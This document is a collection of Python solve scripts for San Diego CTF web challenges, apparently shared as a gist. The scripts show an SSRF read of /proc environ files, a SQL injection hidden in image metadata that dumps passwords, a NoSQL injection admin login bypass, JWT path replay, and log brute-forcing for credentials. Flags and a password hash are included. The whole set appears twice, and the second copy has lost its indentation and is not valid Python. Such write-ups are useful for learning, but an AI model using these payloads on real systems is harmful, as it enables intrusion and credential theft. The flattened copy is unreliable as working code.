DauHoangTai/CurlUp.py

## CurlUp.py
# python3 CurlUp.py | grep "sdctf"
import requests
from base64 import b64encode

URL = 'https://curl.sdc.tf/read/'

for i in range(1,100):
    payload = b64encode(b'{"url":"file:///proc/%d/environ"}' % i).decode("utf-8") #id=9
    r = requests.get(URL+payload)
    if "sdctf" in r.text:
        print(r.text)
        break

## GulliblebyDovesign.py
import requests
import pyexiv2

URL = 'https://dove.sdc.tf'

meta = pyexiv2.ImageMetadata("dove.jpg") #change to your image
meta.read()
meta['Xmp.dc.description'] = "' union select 1,(select group_concat(password) from employee_accts),3-- -"
meta.write()
r = requests.post(URL+'/upload', files={'bird': open('dove.jpg', 'rb')}) #change to your image
print(r.text)

## HuMongous.py
import requests
import sys
import random
import string

URL = 'https://shell.sdc.tf'
sess = requests.Session()

def ranUser(size=6, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

def regUser(discord,username,password):
    data = {"discord":discord,"username":username, "password":password}
    r = requests.post(URL+'/signup', data=data)

def loginAdmin(username,password):
    data = {"username":username,"password[$ne]":password,"password[length]":"40"}
    r = sess.post(URL+'/login',data=data)

def authenAdmin():
    code = input("Enter the code you received: ")
    data = {"code":code}
    r = sess.post(URL+'/2fa',data=data)

def getFlag():
    params = {"shell":"flag-shaped-shell"}
    r = sess.get(URL+'/buyflagshell', params=params)
    print(r.text)

def main():
    if len(sys.argv) > 1:
        username = ranUser()
        discord = sys.argv[1]
        regUser(discord, username, "taidh")
        loginAdmin("admin","taidh")
        authenAdmin()
        getFlag()
    else:
        print("python3 HuMongous.py <your_discord>")
        exit(1)

if __name__ == '__main__':
    main()

## JaWT.py
import requests

sess = requests.session()
URL = 'https://jawt.sdc.tf'
flag = '/s/'
while True:
    data = {"username":"AzureDiamond","password":"hunter2"} #In file /js/login.js
    r = sess.post(URL+'/login',data=data)
    print(flag)
    r1 = sess.get(f'{URL}{flag}')
    flag += r1.text + '/'
    if '}' in flag:
        break
print(flag.replace('/',''))

#sdctf{Th3_m0r3_t0k3ns_the_le55_pr0bl3ms_adf3d}

## lotOfLog.py
from datetime import datetime
import string
import requests
import datetime

URL = 'https://logs.sdc.tf/logs/'
CHECK = ['flag','sdctf','password','pass','passwd','admin']

for year in range(2016,2023):
    for month in range(1,13):
        for day in range(1,32):
            try:
                d = datetime.datetime(year,month, day).strftime("%a")
                path = f'{year}/{month}/{day}/{d}.log'
                print(URL+path)
                r = requests.get(URL+path)
                # print(r.text)
                for key in CHECK:
                    if key.capitalize() in r.text or key.upper() in r.text:
                        print(r.text)
                        print(URL+path)
                        exit()
            except Exception as e:
                print(e)

#https://logs.sdc.tf/logs/2018/6/13/Wed.log
# nc logger.sdc.tf 1338
#Pass: 82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d

#sdctf{b3tr4y3d_by_th3_l0gs_8a4dfd}
	# python3 CurlUp.py \| grep "sdctf"
	import requests
	from base64 import b64encode

	URL = 'https://curl.sdc.tf/read/'

	for i in range(1,100):
	payload = b64encode(b'{"url":"file:///proc/%d/environ"}' % i).decode("utf-8") #id=9
	r = requests.get(URL+payload)
	if "sdctf" in r.text:
	print(r.text)
	break
	import requests
	import pyexiv2

	URL = 'https://dove.sdc.tf'

	meta = pyexiv2.ImageMetadata("dove.jpg") #change to your image
	meta.read()
	meta['Xmp.dc.description'] = "' union select 1,(select group_concat(password) from employee_accts),3-- -"
	meta.write()
	r = requests.post(URL+'/upload', files={'bird': open('dove.jpg', 'rb')}) #change to your image
	print(r.text)
	import requests
	import sys
	import random
	import string

	URL = 'https://shell.sdc.tf'
	sess = requests.Session()

	def ranUser(size=6, chars=string.ascii_uppercase + string.digits):
	return ''.join(random.choice(chars) for _ in range(size))

	def regUser(discord,username,password):
	data = {"discord":discord,"username":username, "password":password}
	r = requests.post(URL+'/signup', data=data)

	def loginAdmin(username,password):
	data = {"username":username,"password[$ne]":password,"password[length]":"40"}
	r = sess.post(URL+'/login',data=data)

	def authenAdmin():
	code = input("Enter the code you received: ")
	data = {"code":code}
	r = sess.post(URL+'/2fa',data=data)

	def getFlag():
	params = {"shell":"flag-shaped-shell"}
	r = sess.get(URL+'/buyflagshell', params=params)
	print(r.text)

	def main():
	if len(sys.argv) > 1:
	username = ranUser()
	discord = sys.argv[1]
	regUser(discord, username, "taidh")
	loginAdmin("admin","taidh")
	authenAdmin()
	getFlag()
	else:
	print("python3 HuMongous.py <your_discord>")
	exit(1)

	if __name__ == '__main__':
	main()
	import requests

	sess = requests.session()
	URL = 'https://jawt.sdc.tf'
	flag = '/s/'
	while True:
	data = {"username":"AzureDiamond","password":"hunter2"} #In file /js/login.js
	r = sess.post(URL+'/login',data=data)
	print(flag)
	r1 = sess.get(f'{URL}{flag}')
	flag += r1.text + '/'
	if '}' in flag:
	break
	print(flag.replace('/',''))

	#sdctf{Th3_m0r3_t0k3ns_the_le55_pr0bl3ms_adf3d}
	from datetime import datetime
	import string
	import requests
	import datetime

	URL = 'https://logs.sdc.tf/logs/'
	CHECK = ['flag','sdctf','password','pass','passwd','admin']

	for year in range(2016,2023):
	for month in range(1,13):
	for day in range(1,32):
	try:
	d = datetime.datetime(year,month, day).strftime("%a")
	path = f'{year}/{month}/{day}/{d}.log'
	print(URL+path)
	r = requests.get(URL+path)
	# print(r.text)
	for key in CHECK:
	if key.capitalize() in r.text or key.upper() in r.text:
	print(r.text)
	print(URL+path)
	exit()
	except Exception as e:
	print(e)

	#https://logs.sdc.tf/logs/2018/6/13/Wed.log
	# nc logger.sdc.tf 1338
	#Pass: 82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d

	#sdctf{b3tr4y3d_by_th3_l0gs_8a4dfd}